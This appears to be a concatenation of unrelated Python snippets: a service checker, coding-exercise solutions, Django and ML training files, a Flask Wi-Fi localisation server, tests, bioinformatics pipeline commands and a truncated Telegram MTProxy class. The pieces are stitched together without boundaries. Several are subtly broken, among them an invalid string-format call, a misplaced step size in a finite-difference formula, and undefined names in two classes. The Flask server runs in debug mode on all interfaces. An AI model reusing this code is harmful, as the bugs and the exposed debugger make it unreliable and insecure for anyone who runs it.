'text'): logger.info("failed") else: try: result = json.loads(r.text) servicetatus = dict(serviceStatusInit) servicetatus.update(result) if servicetatus.has_key('version'): servicetatus['status'] = 'On' else: servicetatus['status'] = 'NoSuch' except ValueError: servicetatus = dict(serviceStatusInit) servicetatus['status'] = 'Off' else: servicetatus = dict(serviceStatusInit) except requests.exceptions.ConnectionError: servicetatus = dict(serviceStatusInit) servicetatus['status'] = 'ConnectionError' finally: return servicetatus # def checkisRunning(): # print isRunning(testflag) def _isRunning(serviceStatus): """ Function: _isRunning() Desc: 检查服务是否都On,检查到服务非正常状态,返回False,不会继续检查。 Args: requests version API retruns dict(serviceStatus)    - dict   Return: False/None   Usage:   Maintainer: wangfm   CreateDate: 2016/12/7 """ for flagtmp in serviceStatus: if flagtmp['status'] == 'On': logger.info('{0}: {1}'.format(flagtmp['serviceName'], flagtmp['status'])) else: logger.info('{0}: {1}'.format(flagtmp['serviceName'], flagtmp['status'])) return False def _checkRunning(plathost): """ Function: _checkRunning() Desc: 检查服务是否都正常,正常则返回True,不正常则重复检查最多5次。 Args:    -   Return: True/None   Usage:   Maintainer: wangfm   CreateDate: 2016/12/7 """ arrstatus = [] for serviceInfo in serviceInfos: arrstatus.append(_queryStatus(plathost, serviceInfo['serviceName'])) for dotimes in range(5): logger.info("###################Service Status###################") if _isRunning(arrstatus) is not False: logger.info("Service is Running..") logger.info("####################################################") return True else: logger.info('sleep 120s..') sleep(120) logger.info("####################################################") def t_status(plathost): """ Function: _status() Desc: 通过_queryStatus()返回一个服务状态list Args:    -   Return:   Usage:   Maintainer: wangfm   CreateDate: 2016/12/7 """ arrstatus = [] for serviceInfo in serviceInfos: arrstatus.append(_queryStatus(plathost, serviceInfo['serviceName'])) return arrstatus def checkRunner(plathost): return _checkRunning(plathost) if __name__ == "__main__": # if isRunning(testflag) is False: # print "no" # else: # print "yes" # checkRunning() # print checkRunning() print t_status('10.1.41.12', serviceInfos)
from django.apps import AppConfig class ProductdtConfig(AppConfig): name = 'ProductDT' verbose_name = '产品'
a = "abcdefghijklmnopqrstuwxyz" n = 5 a = a[:n] a = a[n-1::-1] #reversing rev = n-1 count , i = 0 , 0 while i>=0: count+=1 res = '-'.join(a[:i]+a[i::-1]) print(res.center((4*n)-3, '-')) if(count >= (n)): i-=1 else: i+=1
# -*- coding: utf-8 -*- """ Created on Wed Dec 23 17:51:34 2015 @author: HSH """ class Solution(object): def rotate(self, matrix): """ :type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead. """ start = 0 end = len(matrix) - 1 while start < end: for i in range(start, end): offset = i - start temp = matrix[start][i] matrix[start][i] = matrix[end - offset][start] matrix[end - offset][start] = matrix[end][end - offset] matrix[end][end - offset] = matrix[start + offset][end] matrix[start + offset][end] = temp start += 1 end -= 1 return
#!/usr/bin/env python # -*- coding:utf-8 -*- # Author:hua import re with open("test2.txt","r",encoding="utf-8") as f: s11 = f.read() # print(s11) s1=s11.strip() s2 = s1.replace(">","") s3 = s2.replace("<","") s4 = s2.replace("=","") s5 = s4.replace("=","") s6 = re.sub('[<>?;($#&":\-\'.//!}{)_]+','',s5) s7=s6.replace('<>< ="-:','') print(s7) file = open('test3.txt', 'wb') file.write(str(s7).encode("utf-8")) file.close()
# see http://blog.luisrei.com/articles/flaskrest.html # curl -H "Content-type: application/json" -X POST http://127.0.0.1:5000/submit -d @test_data.json from flask import Flask, request, json import numpy as np import tensorflow as tf import os, sys, random, csv, math from model import create_network from utils import read_labels num_results = 3 mean_path = 'mean.npy' std_path = 'std.npy' metainfo_path = 'wifiscan_metainfo.csv' labels_csv = 'wifiscan_labels.csv' network_name = 'wifi_model_log-1-79100' load_model_from = 'Model/80/' + network_name u = read_labels(labels_csv) name_to_vector = u['name_by_vector'] vector_to_name = u['vector_by_name'] classes = u['names'] mean = np.load(mean_path) std = np.load(std_path) n_classes = len(classes) n_features = mean.shape[0] mac_order = [] with open(metainfo_path, 'rt') as f: reader = csv.reader(f, delimiter=';') for row in reader: mac_order.append(row[1]) default_level = math.log10(100+1) app = Flask(__name__) history = [] if __name__ == '__main__': g = tf.Graph() with g.as_default(): with tf.Session(graph = g) as sess: X, Y_pred = create_network(n_features, n_classes, is_training=False) init = tf.global_variables_initializer() sess.run(init) saver = tf.train.Saver() print("Loading model from", load_model_from) saver.restore(sess, load_model_from) @app.route('/') def index(): return "Hello, World! POST a JSON map of MAC->abs(signal) to /submit" @app.route('/submit', methods = ['POST']) def submit(): if request.headers['Content-Type'] == 'application/json': empty_vector = np.asarray( [default_level]*n_features, dtype=np.float ) for mac, signal in request.json.items(): if mac not in mac_order: continue index = mac_order.index(mac) empty_vector[index] = math.log10(1+signal) x = (empty_vector - mean)/(std + 1e-10) x = np.expand_dims(x, axis=0) pred = sess.run([Y_pred], feed_dict={X: x})[0][0] print("pred=", pred) topIndices = pred.argsort()[-num_results:][::-1].tolist() #print( classes ) #print( [i for i in topIndices] ) #print( [classes[i] for i in topIndices] ) #print( [pred[i] for i in topIndices] ) resp = [ [classes[i] , pred[i]] for i in topIndices] #print(str(resp)) top = topIndices[0] history.append(top) if len(history) > 10: h = history[-10:] f = {} for n in h: if not n in f: f[n] = 0 f[n]+=1 mx = 0 top = 0 for i, c in f.items(): if c > mx: mx = c top = i print(classes[top] + ": " + str(pred[top])) #if pred[top] <= 0.5: # return "not sure..." return "" + classes[top] + ":" + str(pred[top]) #return "{'result':" + str(resp) + "}" return "{'err': '415 Unsupported Media Type ;)'}" app.run(debug=True, host="0.0.0.0")
from .pages.main_page import MainPage from .pages.product_page import ProductPage def test_guest_should_see_login_link(browser): #link = "http://selenium1py.pythonanywhere.com/catalogue/the-shellcoders-handbook_209/?promo=newYear" link = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=newYear2019" page = MainPage(browser, link) page.open() product_page = ProductPage(browser, browser.current_url) product_page.add_good_to_basket() product_page.solve_quiz_and_get_code() product_page.check_good()
import support_lib as bnw import time # 2016/08/31 - Original version # This routine attempts to add a player to the specified game def createPlayer(playerEmail, playerName, shipName, gameURL): debug = True # xpaths xEmailAddress = 'html/body/form/dl/dd[1]/input' xShipName = 'html/body/form/dl/dd[2]/input' xPlayerName = 'html/body/form/dl/dd[3]/input' xPageBanner = 'html/body/h1' xSubmitButton = 'html/body/form/div/input[1]' if debug: print("Attempting to load the new player entry page") newPlayerPage = 'http://{}/new.php'.format(gameURL) bnw.loadPage(newPlayerPage) bannerText = bnw.textFromElement(xPageBanner) if not bannerText == 'Create New Player': if debug: print('Unable to load the create new player page - bad URL?') return ['ERROR', 'Bad URL'] if not bnw.fillTextBox(xEmailAddress, playerEmail): if debug: print('Unable to fill in the new player email address') return ['ERROR', 'E-Mail XPath Error'] if not bnw.fillTextBox(xShipName, shipName): if debug: print('Unable to fill in the new player ship name') return ['ERROR', 'Ship Name XPath Error'] if not bnw.fillTextBox(xPlayerName, playerName): if debug: print('Unable to fill in the new player name') return ['ERROR', 'Player Name XPath Error'] if not bnw.clickButton(xSubmitButton): if debug: print('Unable to click the new player submit button') return ['ERROR', 'Submit Button Error'] time.sleep(3) bannerText = bnw.textFromElement(xPageBanner) if not bannerText == 'Create New Player Phase Two': if debug: print('Error entering new player info?') return ['ERROR', 'Bad Player Info'] print('Password must have been sent...')
# 1. Nhập vào 2 số nguyên a, b. In ra các số nguyên nằm giữa a và b trên cùng 1 dòng. #--------------------- a = int(input("Nhap so nguyen a : ")) b = int(input("Nhap so nguyen b : ")) for i in range(b+1,a,1 ) : print(i ,end = ' ') #-----------------------
class Solution: def rob(self, nums: List[int]) -> int: l = len(nums) dp = [0]*l if l == 0: return 0 if l < 3: return max(nums) dp[0] = nums[0] dp[1] = nums[1] dp[2] = nums[0]+nums[2] for i in range(3,l): dp[i] = nums[i]+max(dp[i-2],dp[i-3]) # print(dp) return max(dp[-1],dp[-2])
# -*- coding: utf-8 -*- from typing import List class Solution: def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int: sorted_box_types, result = ( sorted(boxTypes, key=lambda el: el[1], reverse=True), 0, ) for number_of_boxes, number_of_units_per_box in sorted_box_types: number_of_boxes_taken = min(number_of_boxes, truckSize) result += number_of_boxes_taken * number_of_units_per_box truckSize -= number_of_boxes_taken if not truckSize: break return result if __name__ == "__main__": solution = Solution() assert 8 == solution.maximumUnits([[1, 3], [2, 2], [3, 1]], 4) assert 91 == solution.maximumUnits([[5, 10], [2, 5], [4, 7], [3, 9]], 10)
# 闭包 # 保存,返回闭包时的变量的范围和状态(外层函数变量的状态) # 闭包需要有内层函数 # 闭包内层函数需要调用外层函数变量 # 返回出内层函数 def func(a, b): c = 10 def inner_func(): s = a + b + c print("相加之和的结果是:", s) return inner_func ifunc = func(2, 3) ifun1 = func(2, 8) ifunc() def funv(): c = 1 def funb(): print("时间") def funN(): funb() print("funN") return funN ifun2 = funv() ifun2() # 计数器 def generate_count(): counter = [0] def add_one(): # nonlocal counter 不需要加局部变量注释,因为是列表,列表是可变的 counter[0] += 1 print("当前是第{}次调用".format(counter)) return add_one counter = generate_count() counter() counter()
# -*- coding: utf-8 -*- """ Created on Tue Feb 11 23:32:56 2020 @author: shaun """ import numpy as np def firstorder(f1,f2,h): answer=(f1-f2)/h return answer def firstorderwhole(listx,listy,h): L=len(listy) y=[] x=[] for i in range(0,L-1): y.append(firstorder(listy[i],listy[i+1],h)) x.append(listx[i]) return [x,y] def secondorder(f1,f3,h): y=[] x=[] answer=(f3-f1)/(2*h) return answer def secondorderwhole(listx,listy): L=len(listy) y=[] x=[] for i in range(1,L-1): h=abs(listx[i]-listx[i-1]) y.append(secondorder(listy[i-1],listy[i],h)) x.append(listx[i]) x=np.array(x) y=np.array(y) return x,y def fourthorder(f1,f2,f3,f4,h): f=(f1-8*f2+8*f3-f4)/12*h return f def fourthorderwhole(listx,listy,h): y=[] x=[] L=len(listy) for i in range(3,L-2,3): y.append(fourthorder(listy[i-2],listy[i-1],listy[i+1],listy[i+2],h)) x.append(listx[i]) return x,y def fourthorders(f1,f2,f3,f4,h): A=np.matrix([[1,1,1,1],[0,1,2,3],[0,0.5,2,9/2],[0,1/6,8/6,27/6]],float) B=np.matrix([[0],[-1/h],[0],[0]],float) A_inverse= np.linalg.inv(A) a=A_inverse*B answer=a[0]*f1+a[1]*f2+a[2]*f3+a[3]*f4 return answer def tridiag(a, b, c, k1=-1, k2=0, k3=1): return np.diag(a, k1) + np.diag(b, k2) + np.diag(c, k3) #pade scheme def pade(a,b,c,d,l,F): A=[] B=[] C=[] D=[] B.append(b[0]) C.append(c[0]) print("this is l length:"+ str(l)) for k in range(0,l-2): A.append(a[1]) B.append(b[1]) C.append(c[1]) B.append(b[2]) A.append(a[2]) D.append(d[0][0]*F[0]+d[0][1]*F[1]+d[0][2]*F[2]) print("this is F length:"+str(len(F))) for k in range(0,len(F)-2): D.append(d[1][0]*(F[k+2]-F[k])) D.append(d[2][0]*F[-3]+d[2][1]*F[-2]+d[2][2]*F[-1]) T = tridiag(A, B, C) print(T) alpha=[B[0]] beta=[] victor=[D[0]] N=len(A) f=[] for k in range(0,N): beta.append((A[k]/alpha[k])) alpha.append(B[k+1]-C[k]*beta[k]) for k in range(0,N): victor.append(D[k+1]-beta[k]*victor[-1]) f.append(victor[-1]/alpha[-1]) for k in range(N-1,-1,-1): f.append((victor[k]-C[k]*f[-1])/alpha[k]) f.reverse() return f #use this if you do not have a triangular structure def badpade(a,b,c,d,l,F): A=[] B=[] C=[] D=[] B.append(b[0]) C.append(c[0]) for k in range(0,l-2): A.append(a[1]) B.append(b[1]) C.append(c[1]) B.append(b[2]) A.append(a[2]) D.append([d[1][0]*(F[1]-F[l-1])]) for k in range(0,len(F)-2): D.append([d[1][0]*(F[k+2]-F[k])]) D.append([d[1][0]*(F[0]-F[l-1])]) T = tridiag(A, B, C) T[0,2]=c[2] T[-1,-3]=a[0] D=np.array(D) IT=np.linalg.inv(T)*(D.transpose()) f=np.matmul(IT,D) return f d=np.array([[1,2,3],[3,0,0],[7,8,9]], int) ans=badpade([-5,1,2],[1,4,1],[2,1,82],d,5,[1,1,1,1,1]) #print(pade([0,1,2],[1,4,1],[2,1,0],d,5,[1,1,1,1,1])) print(ans)
import unittest from katas.kyu_8.bug_fixing_6 import eval_object class EvalObjectTestCase(unittest.TestCase): def test_equals(self): self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '+'}), 2) def test_equals_2(self): self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '-'}), 0) def test_equals_3(self): self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '/'}), 1) def test_equals_4(self): self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '*'}), 1) def test_equals_5(self): self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '%'}), 0) def test_equals_6(self): self.assertEqual(eval_object({'a': 1, 'b': 1, 'operation': '**'}), 1)
""" Fuzzy matching of strings/names. """ import csv from collections import defaultdict, Counter def group_by(kv_pairs): """Group key-value pairs by key""" groups = defaultdict(list) for k, v in kv_pairs: groups[k].append(v) return groups def ngrams(text, n=3): """Return list of text n-grams of size n""" return {text[i:i + n].lower() for i in range(len(text) - n + 1)} def find(query, index): """Find best match of query string in n-gram index""" sgrams = ngrams(query) matches = Counter(sid for ngram in sgrams for sid in index.get(ngram, [])) return matches.most_common(1) def create_index(filepath): """Create n-gram index that maps n-grams to subject ids""" sid2name = load_sid2name(filepath) return group_by((ngram, sid) for sid, name in sid2name for ngram in ngrams(name)) def load_sid2name(filepath): """Load file that maps subject ids to names""" with open(filepath) as csvfile: reader = csv.reader(csvfile) next(reader) # skip header for sid, name in reader: yield sid.strip(), name.replace(',', ' ') # Example main if __name__ == '__main__': print('running') index = create_index('../data/index.csv') while 1: query = input('search: ') if query == 'q': break match = find(query, index) print(match[0] if match else 'NO MATCH') print('-' * 50)
class Vetor: def __init__(self, lista): self.lista = lista self.ordenado = False def __str__(self): return self.nome
import math import os import numpy as np import tensorflow as tf from tqdm import tqdm from Inception import inception import hyperparams as hp BUFFER_SIZE = 100 x_train = [] y_train = [] categories = os.listdir(path='Images')[:10] print(len(categories)) num_categories = len(categories) for idx, category in enumerate(categories): files = os.listdir(path='Images/' + category) for file in files: img = tf.keras.preprocessing.image.load_img('Images/%s/%s' % (category, file), target_size=(hp.ss, hp.ss)) img = tf.keras.preprocessing.image.img_to_array(img) img /= 255 x_train.append(img) y_train.append(idx) x_train = np.array(x_train, dtype=np.float32) print(y_train) y_train = tf.keras.utils.to_categorical(np.array(y_train)) print(x_train.shape) print(y_train) train_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train)).shuffle(BUFFER_SIZE).batch(hp.batch_size) print(train_dataset) model = inception(num_categories) tf.keras.utils.plot_model(model, show_shapes=True) optimizer = tf.keras.optimizers.Adam(1e-4) checkpoint_prefix = os.path.join(hp.checkpoint_dir, "ckpt") checkpoint = tf.train.Checkpoint(model=model, optimizer=optimizer) if os.path.exists(hp.checkpoint_dir): checkpoint.restore(tf.train.latest_checkpoint(hp.checkpoint_dir)) # print(model.summary()) loss_object = tf.keras.losses.CategoricalCrossentropy() print('Prediction: ', np.argmax(model.predict(x_train[0].reshape(1, 299, 299, 3)))) train_loss = tf.keras.metrics.Mean(name='train_loss') train_accuracy = tf.keras.metrics.CategoricalAccuracy(name='train_accuracy') @tf.function def train_step(imgs, lbls): with tf.GradientTape() as tape: predictions = model(imgs, training=True) loss = loss_object(lbls, predictions) gradients = tape.gradient(loss, model.trainable_variables) optimizer.apply_gradients(zip(gradients, model.trainable_variables)) train_loss(loss) train_accuracy(lbls, predictions) def train(): def ceil(val): return math.ceil(val * 100) / 100 for epoch in range(hp.epochs): train_loss.reset_states() train_accuracy.reset_states() for images, labels in tqdm(train_dataset, total=len(list(train_dataset))): train_step(images, labels) if (epoch + 1) % 1 == 0: checkpoint.save(file_prefix=checkpoint_prefix) template = 'Epoch {}, Loss: {}, Accuracy: {}' print(template.format(epoch + 1, ceil(train_loss.result()), ceil(train_accuracy.result() * 100))) train()
import torch from torch.autograd import Variable from torch import nn, optim class SimpleCNN(nn.Module) : def __init__(self) : # b, 3, 32, 32 super().__init__() layer1 = nn.Sequential() layer1.add_module('conv_1', nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, stride=1, padding=1)) # b, 32, 32, 32 layer1.add_module('relu_1', nn.ReLU(True)) layer1.add_module('pool_1', nn.MaxPool2d(2, 2)) # b, 32, 16, 16 self.layer1 = layer1 layer2 = nn.Sequential() layer2.add_module('conv_2', nn.Conv2d(32, 64, 3, 1, padding=1)) # b, 64, 16, 16 layer2.add_module('relu_2', nn.ReLU(True)) layer2.add_module('pool_2', nn.MaxPool2d(2, 2)) # b, 64, 8, 8 self.layer2 = layer2 layer3 = nn.Sequential() layer3.add_module('conv_3', nn.Conv2d(64, 128, 3, 1, padding=1)) # b, 128, 8, 8 layer3.add_module('relu_3', nn.ReLU(True)) layer3.add_module('pool_3', nn.MaxPool2d(2, 2)) # b, 128, 4, 4 self.layer3 = layer3 layer4 = nn.Sequential() layer4.add_module('fc_1', nn.Linear(2048, 512)) layer4.add_module('fc_relu1', nn.ReLU(True)) layer4.add_module('fc_2', nn.Linear(512, 64)) layer4.add_module('fc_relu2', nn.ReLU(True)) layer4.add_module('fc_3', nn.Linear(64, 10)) self.layer4 = layer4 def forward(self, x): conv1 = self.layer1(x) conv2 = self.layer2(conv1) conv3 = self.layer3(conv2) fc_input = conv3.view(conv3.size(0), -1) fc_out = self.layer4(fc_input) return fc_out # 建立模型 model = SimpleCNN() print(model) a=torch.FloatTensor([[1,2,3],[4,5,6]]) print(a)
#!/bin/python3 from sys import stdin key = "" value = [] pom = 1 #TODO Wywalić pierwszego if'a poza for'a jako pojedyńczy stdin > DONE firstRow = stdin.readline() key = firstRow.split('\t')[0] value.append(firstRow.split('\t')[1].replace("\n", "")) for i in stdin: if i.split('\t')[0] == key: value.append(i.split('\t')[1].replace("\n", "")) else: print(key,"\t",value) value = [] key = i.split('\t')[0] value.append(i.split('\t')[1].replace("\n", "")) print(key, "\t", value)
from django.conf.urls import url from . import views app_name="myapp" urlpatterns = [ url(r'^$', views.addressbook), url(r'^add/', views.add), url(r'^upload/', views.upload), url(r'^continue/', views.continueProcessCSV), url(r'^truncate/', views.truncateTable), url(r'^download/', views.downloadCSV), ]
from django.contrib import admin from forum.models import * # Register your models here. ##Admin class ForumAdmin(admin.ModelAdmin): pass class ThreadAdmin(admin.ModelAdmin): list_display = ["title", "forum", "created_by", "time"] list_filter = ["forum","created_by"] class PostAdmin(admin.ModelAdmin): search_fields = ["title", "created_by"] list_display = ["title","thread", "created_by","time"] admin.site.register(Forum,ForumAdmin) admin.site.register(Thread,ThreadAdmin) admin.site.register(Post,PostAdmin)
import json import datetime import sys sys.path.append('../../python') import inject inject.configure() import logging from model.registry import Registry from model.connection.connection import Connection from model.assistance.justifications.imapJustifier.imapJustifier import ImapJustifier if __name__ == '__main__': logging.getLogger().setLevel(logging.DEBUG) reg = inject.instance(Registry) conn = Connection(reg.getRegistry('dcsys')) con = conn.get() try: ImapJustifier.loadJustifications(con) con.commit() finally: conn.put(con)
from math import pi def circle_area(r): if type(r) not in [int, float]: raise TypeError("The radius must be a non-negative real number.") if r < 0: raise ValueError("The radius must not be negative.") return pi*(r**2) def rectangle_area(w,l): if type(w) not in [int, float]: raise TypeError("The width must be a non-negative real number.") if w < 0: raise ValueError("The width must not be negative.") if type(l) not in [int, float]: raise TypeError("The length must be a non-negative real number.") if l < 0: raise ValueError("The length must not be negative.") return w*l def square_area(a): return rectangle_area(a,a)
def draw_stars(x): for new in x: star = new * "*" print star draw_stars([4, 6, 1, 3, 5, 7, 25]) # part 2 def stars2(arr): for x in arr: if isinstance(x, int): print x * "*" elif isinstance(x, str): length = len(x) letter = x[0].lower() print letter * length x = [4, "Tom", 1, "Michael", 5, 7, "Jimmy Smith"] stars2(x)
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). import pytest from pants.backend.google_cloud_function.python.target_types import ( PythonGoogleCloudFunction, PythonGoogleCloudFunctionRuntime, ) from pants.backend.google_cloud_function.python.target_types import rules as target_type_rules from pants.backend.python.target_types import PythonRequirementTarget, PythonSourcesGeneratorTarget from pants.backend.python.target_types_rules import rules as python_target_types_rules from pants.build_graph.address import Address from pants.core.target_types import FileTarget from pants.engine.target import InvalidFieldException from pants.testutil.rule_runner import RuleRunner @pytest.fixture def rule_runner() -> RuleRunner: return RuleRunner( rules=[ *target_type_rules(), *python_target_types_rules(), ], target_types=[ FileTarget, PythonGoogleCloudFunction, PythonRequirementTarget, PythonSourcesGeneratorTarget, ], ) @pytest.mark.parametrize( ["runtime", "expected_major", "expected_minor"], ( # The available runtimes at the time of writing. # See https://cloud.google.com/functions/docs/concepts/python-runtime. ["python37", 3, 7], ["python38", 3, 8], ["python39", 3, 9], ["python310", 3, 10], ["python311", 3, 11], ), ) def test_to_interpreter_version(runtime: str, expected_major: int, expected_minor: int) -> None: assert (expected_major, expected_minor) == PythonGoogleCloudFunctionRuntime( runtime, Address("", target_name="t") ).to_interpreter_version() @pytest.mark.parametrize("invalid_runtime", ("python88.99", "fooobar")) def test_runtime_validation(invalid_runtime: str) -> None: with pytest.raises(InvalidFieldException): PythonGoogleCloudFunctionRuntime(invalid_runtime, Address("", target_name="t"))
# this prints last 2 characters of string def extra_end(str): str2 = "" for i in range(3): str2 = str2 + str[-2:] return str2 # first 2 characters def first_two(str): if len(str) >=2: return str[0:2] return str ''' Return True if the string "cat" and "dog" appear the same number of times in the given string. cat_dog('catdog') → True cat_dog('catcat') → False cat_dog('1cat1cadodog') → True ''' def cat_dog(str): cat = 0 dog = 0 for i in range(2,len(str)): if str[i] == 't' and str[i-1] == 'a' and str[i-2] == 'c': cat = cat + 1 if str[i] == 'g' and str[i-1] == 'o' and str[i-2] == 'd': dog = dog + 1 if cat == dog: return True return False # return how many times string code appears in string # except we'll accept any letter for the 'd', so "cope" and "cooe" count. def count_code(str): code = 0 for i in range(3,len(str)): if str[i] == 'e' and str[i-2] == 'o' and str[i-3] == 'c': code = code + 1 return code # compare end part of 2 strings ''' Given two strings, return True if either of the strings appears at the very end of the other string, ignoring upper/lower case differences (in other words, the computation should not be "case sensitive"). Note: s.lower() returns the lowercase version of a string. end_other('Hiabc', 'abc') → True end_other('AbC', 'HiaBc') → True end_other('abc', 'abXabc') → True ''' def end_other(a, b): if len(a) > len(b) and a[-len(b)::].lower() == b.lower(): return True elif len(b) > len(a) and b[-len(a)::].lower() == a.lower(): return True elif a.lower() == b.lower(): return True return False ''' Find first occurence of a character in a string return -1 if not found ''' def findNeedle(str,needle): for i in range(len(str)): if str[i] == needle: return i return -1 print findNeedle("mystring","k")
def add(x, y): """ADD NUMBERS TO GETHER""" return x + y def substract(x, y): """SUB NUMBERS TO GETHER""" return y - x
python ~/00script/BI_left/python/AutoStarRsem/C1Pipeline.py PBMC0102_42ea;08PBMC0102_191213 trim_galore /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_1.fastq.gz /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_2.fastq.gz --paired --phred33 -o /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/08PBMC0102_191213_191213 fastqc -o /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/01QC/08PBMC0102_191213_191213/beforeQC /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_1.fastq.gz /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/PBMC0102_42ea/PBMC_2-59_2.fastq.gz STAR --runThreadN 2 --genomeDir /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/00ref/STAR38 --sjdbGTFfile /media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/00ref/ensembl/GRCh38/Homo_sapiens.GRCh38.97.gtf --sjdbOverhang 150 --outFilterType BySJout --outFilterMultimapNmax 20 --alignSJoverhangMin 8 --alignSJDBoverhangMin 1 --outFilterMismatchNmax 999 --outFilterMismatchNoverReadLmax 0.02 --alignIntronMin 20 --outFileNamePrefix /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/03star/08PBMC0102_191213_191213/PBMC_2-59 --alignIntronMax 1000000 --alignMatesGapMax 1000000 --readFilesIn /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/08PBMC0102_191213_191213/PBMC_2-59_1_val_1.fq.gz,/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/08PBMC0102_191213_191213/PBMC_2-59_2_val_2.fq.gz --readFilesCommand zcat --quantMode TranscriptomeSAM #======================================================================================================== # conda activate scrna makebeforefastQC(project_name,rawFa,trimFa) makeafterfastQC(project_name,rawFa,trimFa) import os, glob, time start=time.strftime("%y%m%d") project_name="07SMC008_%s"%(start) project_name="07SMC009_191209" maindir="/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/" maindir="/media/cytogenbi1/D2C67EE7C67ECAED/" rawFa=glob.glob("/media/cytogenbi2/6eaf3ba8-a866-4e8a-97ef-23c61f7da612/01raw/SMC009_30ea/*_1.fastq.gz") trimFa=[] for rline in rawFa: trimdir="%s02trim/%s/"%(maindir,project_name) trimfile=rline.split("/")[-1].replace("_1.fastq.gz","_1_val_1.fq.gz") tline="%s%s"(trimdir,trimfile) trimFa.append(tline) trimFa=[a.split("/")[-1].split(outExtension)[0] for a in rawFa] trimFa=glob.glob("%s02trim/%s/*_1_val_1.fq.gz"%(maindir,project_name)) ############ /media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/02trim/07SMC009_191209/SMC_009-1_1_val_1.fq.gz SMC_009-1_1.fastq.gz #trimmed trim1=glob.glob("%s/03trim/01CMC1113/*_1_val_1.fq.gz"%maindir) print(len(trim1)) trim2=glob.glob("%s/03trim/02pbmc/*_1_val_1.fq.gz"%maindir) print(len(trim2)) trim3=glob.glob("%s/03trim/03H69plate/*_1_val_1.fq.gz"%maindir) print(len(trim3)) trim4=glob.glob("%s/03trim/04CMC1819/*_1_val_1.fq.gz"%maindir) print(len(trim4)) trim5=glob.glob("%s/03trim/03H69C1/*_1_val_1.fq.gz"%maindir) print(len(trim5)) trimFa=trim1+trim2+trim3+trim4+trim5 maindir="/media/cytogenbi2/8e7f6c8b-bc45-4c58-816f-a062fd95b91a/" trimFa=glob.glob("%s02trim/07SMC008_191212/*_1_val_1.fq.gz"%maindir) print("trimFa length = ", len(trimFa)) print("sum of trim1...trimN = ", len(trim1)+len(trim2)+len(trim3)+len(trim4)+len(trim5)) #================================================================================================================ ## Merge QC results #================================================================================================================ # for file in `ls *.zip`; do unzip "${file}" -d "${file:0:-4}"; done qcf =glob.glob("/media/desktop-bi-16/D2C67EE7C67ECAED/BI/03qc/*/*/summary.txt") qcline=[] for files in qcf: qcff=open(files) qcline.append(qcff.readlines()) failD={} qctotal =[] for aa in qcline: for bb in aa: qctotal.append(bb) if "fail" in bb: break ouf=open("/media/desktop-bi-16/D2C67EE7C67ECAED/BI/03qc/resQC190917.txt","w") for aaa in qctotal: if "FAIL" in aaa: wrine = "%s:%s\n"%(aaa.split("\t")[2].strip("\n"),aaa.split("\t")[1]) print aaa.split("\t")[2].strip("\n"),":",aaa.split("\t")[1] ouf.write(wrine) ouf.close() failD[aaa.split("\t")[2]]=aaa.split("\t")[1]
# coding=utf-8 import asyncio import hashlib import json import os from openssl import OpenSSLStreamCrypto TG_SERVERS = ["149.154.175.50", "149.154.167.51", "149.154.175.100", "149.154.167.91", "149.154.171.5"] class MTProxy(asyncio.Protocol): def __init__(self, config): super().__init__() self.loop = asyncio.get_event_loop() self.init = True self.config = config self.tg_servers = TG_SERVERS self.to_local_queue = asyncio.Queue() self.to_sender_queue = asyncio.Queue() def connection_made(self, transport): self.transport = transport asyncio.ensure_future(self.start_send()) def data_received(self, data): if self.init: secret_bytes = bytes.fromhex(config.get("secret_key", "0123456789abcdef0123456789abcdef")) buf64 = data[:64] decrypt_key, decrypt_iv, encrypt_key, encrypt_iv = MTProxy.generate_key_iv(buf64=buf64) decrypt_key = hashlib.sha256(decrypt_key + secret_bytes).digest() encrypt_key = hashlib.sha256(encrypt_key + secret_bytes).digest() self.decryptor = OpenSSLStreamCrypto("aes-256-ctr", key=decrypt_key, iv=decrypt_iv, op=0) self.encryptor = OpenSSLStreamCrypto("aes-256-ctr", key=encrypt_key, iv=encrypt_iv, op=1) decrypted_data = self.decryptor.decrypt(buf64) self.dcID = abs(int.from_bytes(decrypted_data[60:62], "little", signed=True)) - 1 for i in range(4): if decrypted_data[56 + i] != 0xef: self.transport.close() if self.dcID > 4 or self.dcID < 0: self.transport.close() asyncio.ensure_future(self.create_sender(self.dcID)) data = data[64:] self.init = False decrypted_data = self.decryptor.decrypt(data) self.to_sender_queue.put_nowait(decrypted_data) async def create_sender(self, dcid): remote_addr = self.tg_servers[dcid], 443 _, self.sender = await self.loop.create_connection(lambda: SenderProtocol(self), *remote_addr) async def start_send(self): while True: data = await self.to_local_queue.get() encrypted_data = self.encryptor.encrypt(data) self.transport.write(encrypted_data) @classmethod def generate_key_iv(cls, buf64): key_iv = buf64[8:56] # key's length:32bytes , iv's length:16bytes decrypt_key, decrypt_iv = key_iv[:32], key_iv[32:] # reverse bytes sequence key_iv = key_iv[::-1] encrypt_key, encrypt_iv = 